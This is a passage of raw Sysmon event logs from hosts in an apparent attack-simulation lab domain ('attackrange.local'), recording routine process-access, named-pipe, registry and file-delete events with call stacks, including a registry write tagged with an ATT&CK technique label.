12:24:43.433{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000440803Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.433{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440802Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.433{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000440801Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:43.433{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 17141700x8000000000000000440800Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-CreatePipe2021-04-27 12:24:43.432{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000440799Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.432{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440798Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.431{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440797Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.431{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2200-00000000BA01}2628C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440796Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.430{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440795Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.429{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440794Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.429{42DC5269-CE99-6086-0E00-00000000BA01}10166276C:\Windows\System32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6a73d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440793Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.429{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440792Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.429{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440791Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.429{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440790Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.429{42DC5269-CE99-6086-1500-00000000BA01}12006856C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292491Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.579{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1D00-00000000BB01}1976C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292490Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.579{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1D00-00000000BB01}1976C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000292489Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localT1122SetValue2021-04-27 12:24:43.563{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exeHKCR\WOW6432Node\CLSID\{3F88CBF8-689B-4FDB-8254-22A54FCF97DD}\InProcServer32\(Default)%%SystemRoot%%\system32\shdocvw.dll 13241300x8000000000000000292488Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localT1122SetValue2021-04-27 12:24:43.563{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exeHKCR\CLSID\{3F88CBF8-689B-4FDB-8254-22A54FCF97DD}\InProcServer32\(Default)%%SystemRoot%%\system32\shdocvw.dll 23542300x8000000000000000292487Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.560{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC0EDAA2152885714BE8990DF789A0A,SHA256=4E59A8CFC7DCE6BFF12653F4C4E67F414361FDD409D91477109C6881711B9906,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292486Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.541{BEA10069-2590-6087-DA0F-00000000BB01}31564272C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292485Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.541{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292484Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.525{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1D00-00000000BB01}1976C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292483Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.525{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1D00-00000000BB01}1976C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292482Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.525{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292481Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.525{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292480Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.525{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292479Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.525{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292478Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.510{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SY